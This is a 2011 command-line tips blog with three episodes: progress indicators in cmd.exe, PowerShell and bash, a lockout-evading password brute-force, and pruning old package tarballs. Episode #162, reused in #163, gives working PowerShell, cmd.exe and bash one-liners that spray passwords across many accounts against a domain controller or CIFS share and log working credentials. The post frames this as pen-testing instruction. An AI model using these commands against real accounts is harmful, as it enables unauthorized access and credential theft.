Tuesday, November 29, 2011

Episode #163: Pilgrim's Progress

Tim checks the metamail:

I hope everyone had a good Thanksgiving. I know I did, and I sure have a lot to be thankful for.

Today we receive mail about mail. Ed writes in about Rob VandenBrink writing in:

Gents,

Rob VandenBrink sent me a cool idea this morning. It's for printing out a text-based progress indicator in cmd.exe. The idea is that if you have a loop that's doing a bunch of stuff, without any indication to the user, you can just echo a dot on the screen at each iteration of the loop to show that you are still alive and have processed another iteration. The issue in cmd.exe is echoing the dot without a CRLF, so that it goes nicely across the screen. Here's Rob's approach (which uses set /p very cleverly to define a variable, but without using that variable). On a few episodes, I used set /a because of its nice property of doing math without a CRLF. Here, Rob uses set /p to avoid the CRLF.

C:\> for /L %i in (1,1,5) do @timeout 1 >nul & <nul (set /p z=.)
..... <-- Progress Dots


Just replace the timeout command with something useful, and vary the FOR iterator loop to something that makes sense.

Worthy of an episode?


Well Ed, you can tell Rob that it is. Rob, feel free to send more cool suggestions to Ed and Ed can send them to us. I'll pass along what I think is worthy of an episode to Hal, so Rob talk to Ed, Ed talk to Tim, Tim talks to Hal, Hal responds to Tim, Tim responds to Ed, Ed responds to Rob. Unless Ed is unavailable, then we Rob should find Tim who will check for Ed, then...

Ok, we'll work out those details later. We certainly need to keep a strict flow of information, or else it could confusing, and we would hate that.

The trick with this command is using the /P switch with the Set command. The /P switch is used to prompt a user for input. The standard syntax looks like this:

SET /P variable=[promptString]


We are using a dummy variable Z to receive input, and the promptString is our dot. We feed NUL into the Set command so it doesn't hang while waiting for input. Since we didn't provide a carriage return the prompt is not advanced to the next line. That way we can output multiple dots on the same line. To prevent extra spaces between the dots we need to make sure there are no spaces between the dot and the next character, whether it be a closing parenthesis or a input redirection (<).

I typically write it a little differently so it is a little clearer that the NUL is being fed into Set, but the effect is the same.

C:\> (set /P z=.<NUL) & (set /P z=.<NUL)
..


PowerShell

One of the best practices of PowerShell is to write each command so the output can be used as input to another command. This means that dots would mess up our nice object-type output. That's no skin off our back, as we have a cmdlet to keep track of progress for us, Write-Progress. However, it does require a bit of knowledge as to the number of iterations we will go through. Not usually a big deal though, but it may require that some input be preloaded so this calculation can be preformed. There are all sorts of cool things we can do with this cmdlet. Examples of coolness include: multiple progress bars, displaying time remaining, and displaying extra information on the current operation.

 Test
Working
[ooooooooooooooooooooooooooooooooooooo ]

PS C:\> 1..100 | % { sleep 1; Write-Progress -Activity Test -Status Working -PercentComplete $_ }


The Activity and Status parameters are used to provide additional information. The Activity is usually used to provide a high level description of the process and the Status switch is used to describe the current operation, assuming there are multiple. Similar to our the cmd.exe command, replace the sleep 1 with something useful.

The SecondsRemaining parameter can be used to display the estimated time remaining. This time must be calculated by the author of the script or command, and since these calculations are never close to correct, I personally refuse to ever even try to calculate the remaining time. So enough of my rant and back to the task at hand.

Multiple progress bars can be used by using a unique ID for each. The default ID is 0, so we can use 1 for the second progress bar.

 Testing
Outer
[oooooooooooooooooo ]
Testing
Inner
[oooooooooooooooooooooooooooooooooooooooooooooooooooooo ]

PS C:\> 1..100 | % { Write-Progress -Activity Testing -Status Outer -PercentComplete $_;
1..100 | % { sleep 0.5; Write-Progress -Activity Testing -Status Inner -PercentComplete $_ -ID 1 }
}


Another bonus is that the progress bar is displayed at the top of the screen so it doesn't interfere with the most recent output. To make it even better, it disappears after the command has completed. We have a progress display and we don't have any messy output to clean up, awesome!

The cmd.exe output is functional, but not great, and the PowerShell version is really pretty. My bet is Hal and his *nix fu is going to snuggle up between these two. Hal, snuggle away.

Hal emerges from a food coma

Don't even get me started about "snuggling" with Tim. Mostly he just rolls over and goes to sleep, leaving me with the aftermath. He never cares about my feelings or what's important to me...

Oh, sorry. I forgot we were talking command line kung fu here. I'm not going to be getting much "snuggling" on that front either, as it turns out. The Linux options pretty much emulate the two choices that Tim presented on the Windows side.

The portable method uses shell built-ins and looks a lot like the CMD.EXE solution. Here's an example using the while loop from last week's Episode:

paste <(awk '{print; print; print; print}' users.txt) passwords.txt |
while read u p; do
mount -t cifs -o domain=mydomain,user=$u,password=$p \
//myshare /mnt >/dev/null 2>&1 \
&& echo $u/$p works && umount /mnt
(( $((++c)) % 100 )) || echo -n . 1>&2
done >working-passwords.txt

The code I've added in bold face is the part that prints dots to show progress. I've got a variable "$c" that gets incremented each time through the loop. We then take the value of that variable modulo 100. Every hundred iterations, that expression will have the value zero, so the echo statement after the "||" will get executed and print a dot. I use "echo -n" so we don't get a newline after the dot.

Notice also the "1>&2" after the echo expression. This causes the dots coming out of the echo command heading for the standard output to go to the standard error instead. That way I'm able to redirect the normal output of the loop-- the usernames and passwords I'm brute-forcing-- into a file using ">working-passwords.txt" at the end of the loop and still see the progress dots on the standard error.

You can slip this code into any loop you care to. And by adjusting the value on the right-hand side of the modulus operator you can cause the dots to be printed more or less frequently, depending on the size of your input. If you're reading a log file that's hundreds of thousands of lines long, you might want to do something like "... % 10000" so your screen doesn't just fill up with dots. On the other hand, you want the dots to appear frequently enough that it looks like something is happening. You just have to play around with the number until you're happy.

While this approach is very portable and easy to use, it only works inside an explicit loop. There are lots of tasks where we're processing data using a series of commands in a pipeline with no loops at all. For example, there's pipelines like the one from Episode #38:

grep 'POST /login/form' ssl_access_log* | 
sed -r 's/.*(MSIE [0-9]\.[0-9]|Firefox\/[0-9]+|Safari|-).*/\1/' |
sort | uniq -c |
awk '{ t = t + $1; print} END { print t " TOTAL" }'

Oh sure, I could force a loop at the front of the pipeline just to get some dots:

while read line; do
echo $line
(( $((++c)) % 10000 )) || echo -n . 1>&2
done <ssl_access_log* | grep 'POST /login/form' | ...

But let's face it, this is gross, inefficient, and silly. What bash is lacking is a built-in construct like PowerShell's Write-Progress cmdlet.

Happily, there's an Open Source utility called "pv" (pipe viewer) that kicks Write-Progress' butt through the flimsy walls of our command line dojo. Unhappily, it's not a built-in utility, so strictly speaking it's not allowed by the rules of our blog. But sometimes it's fun to bring a bazooka to a knife fight.

In it's simplest usage, pv just replaces the silly while loop that I forced onto the beginning of our pipeline:

# pv -c ssl_access_log* | 
grep 'POST /login/form' |
sed -r 's/.*(MSIE [0-9]\.[0-9]|Firefox\/[0-9]+|Safari|-).*/\1/' |
sort | uniq -c | awk '{ t = t + $1; print} END { print t " TOTAL" }' >counts.txt

83.4MB 0:00:05 [16.2MB/s] [=================================>] 100%

pv reads our input files and sends their content to the standard output-- just like the cat command. But it also creates a progress bar on the standard error. The "-c" option tells pv to use "curses" style cursor positioning sequences to update the progress bar more efficiently.

I'm redirecting the actual pipeline output with the browser counts into a file (">counts.txt") so it's easier to focus in on the progress bar. I've captured the output after the loop has completed, so you're seeing the 100% completion bar, but notice that the left-hand side of the bar tracks the total data read and the amount of time taken.

What's really fun, however, is using multiple instances of pv inside a complicated pipeline:

# pv -cN Input ssl_access_log* | 
grep 'POST /login/' | pv -cN grep |
sed -r 's/.*(MSIE [0-9]\.[0-9]|Firefox\/[0-9]+|Safari|-).*/\1/' | pv -cN sed |
sort | uniq -c | awk '{ t = t + $1; print} END { print t " TOTAL" }' >counts.txt

grep: 7.5MB 0:00:04 [1.51MB/s] [ <=> ]
sed: 259kB 0:00:05 [51.8kB/s] [ <=> ]
Input: 83.4MB 0:00:04 [17.1MB/s] [======================>] 100%

You'll notice that I've added two more pv invocations in the middle of our pipeline: one after the grep and one after the sed command. I'm also using the "-N" ("name") flag to assign a unique name to each instance of pv. This name appears in front of each progress bar so you can tell them apart.

What's fun about this mode is that it shows you how much you're reducing the data as it goes through each command. The total "Input" size is 83MB of access logs, which grep winnows down to 7.5MB of matching lines. Then sed removes everything except the browser name and major version number, leaving us with only 260KB of data.

pv is widely available in various Linux distros, though it's not typically part of the base install. There's a BSD Ports version available and it's even in the MacOS HomeBrew system. Solaris folks can find it at Sunfreeware. Everybody else gets to build it from source. But it's a useful tool in your command line toolchest.

Consider this your early Xmas present. And you didn't even have to brave the pepper spray at Wal*mart to get it.

Tuesday, November 15, 2011

Episode #162: Et Tu Bruteforce

Tim is looking for a way in

A few weeks ago I got a call from a Mr 53, of LaNMaSteR53 fame from the pauldotcom blog. Mister, Tim "I have a very cool first name" Tomes was working on a way to brute force passwords. The scenario is hundreds (or more) accounts were created all (presumably) using the same initial password. He noticed all the accounts were created the same day and none of them had ever been logged in to.

To brute force the passwords a subset of a large password dictionary is used tried against each account, but the same password was never used twice. This effectively bypasses the account lockout policy (5 failed attempts) and allows a larger set of passwords to be tested without locking out any accounts.

So instead of this scenario:
user1 - password1, password2, password3, password 4
user2 - password1, password2, password3, password 4
user3 - password1, password2, password3, password 4
...

We do it this way:
user1 - password1, password2, password3, password4
user2 - password5, password6, password7, password8
user3 - password9, password10, password11, password12
...

The effectiveness of this method is based on the assumption that each account was created with the same default password. Instead of testing 4 passwords, we can test 4 * # of users. So for 1000 accounts that means 4000 password guesses instead of just 4.

To pull this off we need to read two files, a user list and a password list. We need to take the first user and the first four passwords, then the send user and the next four passwords, and so on. This is the command to output the username and password pairs.

PS C:\> $usercount=0; gc users.txt | 
% {$user = $_; gc passwords.txt -TotalCount (($usercount * 4) + 4) |
select -skip ($usercount++ * 4) } | % { echo "$user $_" }


user1 password1
user1 password2
user1 password3
user1 password4
user2 password5
user2 password6
user2 password7
user2 password8
user3 password9
...


If we wanted to test the credentials against a domain controller we can do this:

PS C:\> $usercount=0; gc users.txt | % {$user = $_; 
gc passwords.txt -TotalCount (($usercount * 4) + 4) | select -skip ($usercount++ * 4) } |
% { net use \\mydomaincontroller\ipc$ /user:somedomain\$user $_ 2>&1>$null;
if ($?) { echo "This works $user/$_ "; net use \\mydomaincontroller\ipc$ /user:$user /del } }


This works user7/Password30


CMD.EXE

When Pen Testing you many times get access to CMD.EXE only. The PowerShell interfaces are a bit flaky, and many times the systems that are initially compromised don't have it installed so we need to rely on CMD.EXE.

C:\> cmd /v:on /c "set /a usercount=0 >NUL & for /F %u in (users.txt) do @set
/a passcount=0 >NUL & set /a lpass=!usercount!*4 >NUL & set /a upass=!usercount!*4+4
>NUL & @(for /F %p in (passwords.txt) do @(IF !passcount! GEQ !lpass! (IF !passcount!
LSS !upass! (@echo %u %p))) & set /a passcount=!passcount!+1 >NUL) & set /a
usercount=!usercount!+1 >NUL"


user1 password1
user1 password2
user1 password3
user1 password4
user2 password5
user2 password6
user2 password7
user2 password8
user3 password9
...


We start off enabling delayed variable expansion as usual. The usercount is initialized to 0 and it will be used to keep track of how many users have been attempted so far. We need this number to determine the proper password range to use. The users.txt file is then read via a For loop. Inside this (outer) For loop the passcount variable is set to 0. The passcount variable is used to keep track of where we are in the password file so we only use the 4 passwords we need. Related to that, the lower bound (lpass) and the upper bound (upass) are set so we know the range of the 4 passwords to be used. Now it is (finally) time to read the password file.

Another, inner, For loop is used to read through the password file. A pair of If statements are used to make sure the current password is in the proper bounds, and if it is, it is output. The passcount variable is then incremented to keep track of our count. After we go through the entire password file we increment the usercount. The process starts all over using the next user read from the file.

All we need to do now is Frankenstein this command with other Tim's command.

C:\> cmd /v:on /c "set /a usercount=0 >NUL & for /F %u in (users.txt) do @set
/a passcount=0 >NUL & set /a lpass=!usercount!*4 >NUL & set /a upass=!usercount!*4+4
>NUL & @(for /F %p in (passwords.txt) do @(IF !passcount! GEQ !lpass! (IF !passcount!
LSS !upass! (@net use \\DC01 /user:mydomain\%u %p 1>NUL 2>&1 && @echo This works
%u/%p && @net use /delete \\DC01\IPC$ > NUL))) & set /a passcount=!passcount!+1 >NUL)
& set /a usercount=!usercount!+1 >NUL"


This works user7/Password30


There you go, brute away.

Hal is looking for a way out

The basic task of generating the username/password list is pretty easy for the Unix folks because we have the "paste" command that lets us join multiple files together in a line-by-line fashion. The only real trick here is repeating each username input four times before moving on to the next username.

The first way that occurred to me to do this is with awk:

$ paste <(awk '{print; print; print; print}' users.txt) passwords.txt 
user1 password1
user1 password2
user1 password3
user1 password4
user2 password5
...

Here I'm using the bash "<(...)" notation to include the output of our awk command as a file input for the "paste" command. The awk itself just uses multiple print statements to emit each line four times.

Really all the awk is doing for us here, however, is to act as a short-hand for a loop over our user.txt file. We could dispense with the awk an just use shell built-ins:

$ paste <(while read u; do echo -e $u\\n$u\\n$u\\n$u; done <users.txt) passwords.txt 
user1 password1
user1 password2
user1 password3
user1 password4
user2 password5
...

Aside from using a while loop instead of the awk, I'm also using a single "echo -e" statement to output all four lines, rather than calling echo multiple times. I could have done something similar with a single print statement in the awk verson, but somehow I think the "print; print; print; print" was clearer and more readable.

By the way, some of you may be wondering why I have newlines ("\n", rendered above as "\\n" to protect the backwhack from shell interpolation) after the first three $u's but not after the last one. Remember that echo will automatically output a newline at the end of the output, unless we use "echo -n".

But now that we have our username/password list, what do we do with it? Unfortunately, the SMBFS tools for Unix/Linux don't include a working equivalent for "net use". So we'd have to try mounting a share the old-fashioned way in order to test the username and password combos:

paste <(awk '{print; print; print; print}' users.txt) passwords.txt |
while read u p; do
mount -t cifs -o domain=mydomain,user=$u,password=$p \
//myshare /mnt >/dev/null 2>&1 \
&& echo $u/$p works && umount /mnt
done

If the mount command succeeds then the echo command will output the username and password. Then we'll call umount to unmount the share before moving on to the next attempt. It's kind of hideous, but it will work.

Oh well, at least it's more readable than that CMD.EXE insanity Tim threw down...

Tuesday, November 8, 2011

Episode #161: Cleaning up the Joint

Hal's got email

Apparently tired of emailing me after we post an Episode, Davide Brini decided to write us with a challenge based on a problem he had to solve recently. Davide had a directory full of software tarballs with names like:

package-foo-10006.tar.gz
package-foo-10009.tar.gz
package-foo-8899.tar.gz
package-foo-9998.tar.gz
package-bar-3235.tar.gz
package-bar-44328.tar.gz
package-bar-4433.tar.gz
package-bar-788.tar.gz

As the packages accumulate in the directory, Davide wanted to be able to get rid of everything but the most recent three tarballs. The trick is that we're only allowed to rely on the version number that's the third component of the file pathname, and not file metadata like the file timestamps. And of course our final solution should work no matter how many packages are in the directory or what their names are, and no matter how many versions of each package currently exist in the directory.

The code I used to create my test cases is actually longer than my final solution. Here's the quickie I tossed off to create a directory of interesting test files:

$ for i in one two three four five; do 
for j in {1..5}; do
touch pkg-$i-$RANDOM.tar.gz;
done;
done

$ ls
pkg-five-20690.tar.gz pkg-four-6945.tar.gz pkg-three-29078.tar.gz
pkg-five-22215.tar.gz pkg-one-16581.tar.gz pkg-three-31807.tar.gz
pkg-five-24754.tar.gz pkg-one-18962.tar.gz pkg-two-1461.tar.gz
pkg-five-27332.tar.gz pkg-one-25712.tar.gz pkg-two-14713.tar.gz
pkg-five-3200.tar.gz pkg-one-5325.tar.gz pkg-two-23569.tar.gz
pkg-four-12855.tar.gz pkg-one-8421.tar.gz pkg-two-28329.tar.gz
pkg-four-14868.tar.gz pkg-three-11196.tar.gz pkg-two-526.tar.gz
pkg-four-17282.tar.gz pkg-three-15935.tar.gz
pkg-four-19436.tar.gz pkg-three-25092.tar.gz

The outer loop creates the different package names, and the inner loop creates five instances of each package. To get a wide selection of version numbers, I just use $RANDOM to get a random value between 1 and 32K.

The tricky part about this challenge is that tools like "ls" will sort the file names alphabetically rather than numerically. In the output above, for example, you can see that "pkg-two-526.tar.gz" sorts at the very end of the list, even though numerically version number 526 is the earliest version in the "pkg-two" series of files.

We can use "sort" to list the files in numeric order by version number:

$ ls | sort -nr -t- -k3 
pkg-three-31807.tar.gz
pkg-three-29078.tar.gz
pkg-two-28329.tar.gz
pkg-five-27332.tar.gz
pkg-one-25712.tar.gz
pkg-three-25092.tar.gz
...

Here I'm doing a descending ("reversed") numeric sort ("-nr") on the third hypen-delimited field ("-t- -k3"). All the package names are mixed up, but at least the files are in numeric order.

Now all I have to do is pick out the the fourth and later copies of any particular package name. For this there's awk:

$ ls | sort -nr -t- -k3 | awk -F- '++a[$1,$2] > 3' 
pkg-five-20690.tar.gz
pkg-three-15935.tar.gz
pkg-four-12855.tar.gz
pkg-three-11196.tar.gz
pkg-one-8421.tar.gz
pkg-four-6945.tar.gz
pkg-one-5325.tar.gz
pkg-five-3200.tar.gz
pkg-two-1461.tar.gz
pkg-two-526.tar.gz

The "-F-" option tells awk to split its input on the hyphens. I'm using "++a[$1,$2]" to count the number of times I've seen a particular package name. When I get to the fourth and later entries for a given package, then my conditional statement will be true. Since I don't specify an action to take, the default assumption is "{print}" and the file name gets printed. Stick that in your awk pipe and smoke it, Davide!

Removing the files instead of just printing their names is easy. Just pipe the output into xargs:

$ ls | sort -nr -t- -k3 | awk -F- '++a[$1,$2] > 3' | xargs rm -f
$ ls
pkg-five-22215.tar.gz pkg-four-19436.tar.gz pkg-three-29078.tar.gz
pkg-five-24754.tar.gz pkg-one-16581.tar.gz pkg-three-31807.tar.gz
pkg-five-27332.tar.gz pkg-one-18962.tar.gz pkg-two-14713.tar.gz
pkg-four-14868.tar.gz pkg-one-25712.tar.gz pkg-two-23569.tar.gz
pkg-four-17282.tar.gz pkg-three-25092.tar.gz pkg-two-28329.tar.gz

I've used the "-f" option here just so that we don't get an error message when we run the command and there end up being no files that need to be removed.

And that's my final answer, Regis... er, Davide! Thanks for a fun challenge! To make things really interesting for Tim, I think we should make him do this one in CMD.EXE, don't you?

Tim thinks Hal is mean

Not only does Hal throw down the gauntlet and request CMD.EXE, but he makes this problem more difficult by making this two challenges in one. Not being one to turn down a challenge (even though I should), we start off with PowerShell by creating the test files:

PS C:\> foreach ($i in "one","two","three","four","five" ) {
foreach ($j in 1..5) {
Set-Content -Path "pkg-$i-$(Get-Random -Minimum 1 -Maximum 32000).tar.gz" -Value ""
} }


PS C:\> ls

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/1/2011 1:23 PM 2 pkg-five-19410.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-five-21426.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-five-26739.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-five-27296.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-five-6618.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-18533.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-25925.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-31089.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-511.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-8343.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-13225.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-24343.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-2835.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-308.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-4484.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-13226.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-15026.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-23830.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-30553.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-4311.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-12923.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-27368.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-27692.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-28727.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-3888.tar.gz


Similar to what Hal did, we use multiple loops to create the files. Set-Content is used to create the file. The filename is a little crazy as we need to use the output of Get-Random in our path. The $() is used to wrap the cmdlet and only return the output.

I feel a big like a ditch digger who is tasked with filling in the ditch he just dug, but that's the challange. We have files and some need to be deleted.

We start off grouping the files based on their package and sorting them by their version.

PS C:\> ls | sort {[int]($_.Name.Split("-.")[2])} -desc |
group {$_.Name.Split("-.")[1]}


Count Name Group
----- ---- -----
5 four {pkg-four-31089.tar.gz, pkg-four-25925.tar.gz, pkg-four-1853...
5 three {pkg-three-30553.tar.gz, pkg-three-23830.tar.gz, pkg-three-1...
5 two {pkg-two-28727.tar.gz, pkg-two-27692.tar.gz, pkg-two-27368.t...
5 five {pkg-five-27296.tar.gz, pkg-five-26739.tar.gz, pkg-five-2142...
5 one {pkg-one-24343.tar.gz, pkg-one-13225.tar.gz, pkg-one-4484.ta...


The package and version number are retrieved by using the Split method using dots and dashes as delimiters. The version is the 3rd item (index 2, remember, base zero) and the package is the 2nd (index 1). The version is used to sort and the package name is used for grouping.

At this point we have groups that contain the files sorted, in descending order, by the version number. Now we need to get all but the first two items.

PS C:\> ls | sort {[int]($_.Name.Split("-.")[2])} -desc |
group {$_.Name.Split("-.")[1]} | % { $_.Group[2..($_.Count)]}


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/1/2011 1:23 PM 2 pkg-four-18533.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-8343.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-511.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-15026.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-13226.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-4311.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-27368.tar.gz
...


The ForEach-Object cmdlet (alias %) is used to operate on each group. As you will remember, the items in the group are sorted in descending order by the version number. We need to select the 3rd through the last item, and this is accomplished by using the Range operator (..) with our collection of objects. The Range of 2..($_.Count) gives us everything but the first two items. Technically, I have an off-by-one issue with the upper bound, but PowerShell is kind enough not to barf on me. I did this to save a few key strokes; although, I am using a lot more key strokes to justify my laziness. Ironic? Yes.

All we have to do now is pipe it into the Remove-Item (alias del, erase, rd, ri, rm, rmdir).

PS C:\> ls | sort {[int]($_.Name.Split("-.")[2])} -desc |
group {$_.Name.Split("-.")[1]} | % { $_.Group[2..($_.Count)]} | rm


PS C:\> ls

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/1/2011 1:23 PM 2 pkg-five-26739.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-five-27296.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-25925.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-four-31089.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-13225.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-one-24343.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-23830.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-three-30553.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-27692.tar.gz
-a--- 11/1/2011 1:23 PM 2 pkg-two-28727.tar.gz


Not too bad, but now it is time for the sucky part.

CMD.EXE

Here is the file creator:

C:\> cmd /v:on /c "for /r %i in (pkg-one pkg-two pkg-three pkg-four pkg-five) do
@for /l %j in (1,1,5) do @echo "" > %i-!random!.tar.gz"


Similar to the previous examples, this uses two loops to write our file.

Now for the beast to nuke the old packages...

C:\> cmd /v:on /c "for /f %a in ('^(for /f "tokens=2 delims=-." %b in ^('dir /b *.*'^) do
@echo %b ^) ^| sort') do @set /a first=0 > NUL & @set /a second=0 > NUL & @(for /f "tokens=1,2,3,*
delims=-." %i in ('dir /b *.* ^| find "%a"') do @set /a v=%k > NUL & IF !v! GTR !first! (del
%i-%j-!second!.tar.gz && set /a second=!first! > NUL && set /a first=!v! > NUL) ELSE (IF !v! GTR
!second! (del %i-%j-!second!.tar.gz && set /a second=!v! > NUL) ELSE (del %i-%j-!v!.tar.gz)))"


C:\> dir
Volume in drive C has no label.
Volume Serial Number is DEAD-BEEF

Directory of C:\

11/01/2011 01:23 PM <DIR> .
11/01/2011 01:23 PM <DIR> ..
11/01/2011 01:23 PM 2 pkg-five-26739.tar.gz
11/01/2011 01:23 PM 2 pkg-five-27296.tar.gz
11/01/2011 01:23 PM 2 pkg-four-18533.tar.gz
11/01/2011 01:23 PM 2 pkg-four-8343.tar.gz
11/01/2011 01:23 PM 2 pkg-one-13225.tar.gz
11/01/2011 01:23 PM 2 pkg-one-24343.tar.gz
11/01/2011 01:23 PM 2 pkg-three-23830.tar.gz
11/01/2011 01:23 PM 2 pkg-three-30553.tar.gz
11/01/2011 01:23 PM 2 pkg-two-27692.tar.gz
11/01/2011 01:23 PM 2 pkg-two-28727.tar.gz
10 File(s) 20 bytes
2 Dir(s) 1,234,567,890 bytes free


As this command is barely decipherable, I'm not going to go through it in great detail, but I will describe it at a high level.

We start off by enabling delayed variable expansion so we can set and immediately use a variable. We then use a trusty For loop (actually, I don't trust the sneaky bastards) to find the package names. We then use another For loop to work with each file that matches the current package by using a directory listing plus the Find command. Now is where it get really hairy...

We need to keep the two files with the highest version number. To do this we use two variables, First and Second, to hold the two highest version numbers. Both variables are initialized to zero. Next we need to do some crazy comparisons.

1. If the version number of the current file for the current package is greater than First, we delete the file related to Second, move First to Second, and set First equal to the current version.

2. If the version number of the current file for the current package is less than First but greater than Second, we delete the file related to Second and set Second equal to the current version.

3. If the version number of the current file for the current package is less than both First and Second then the file is deleted.

Ok, Hal, you have your CMD.EXE. I would say "TAKE THAT", but I'm pretty sure I'm the one that was taken.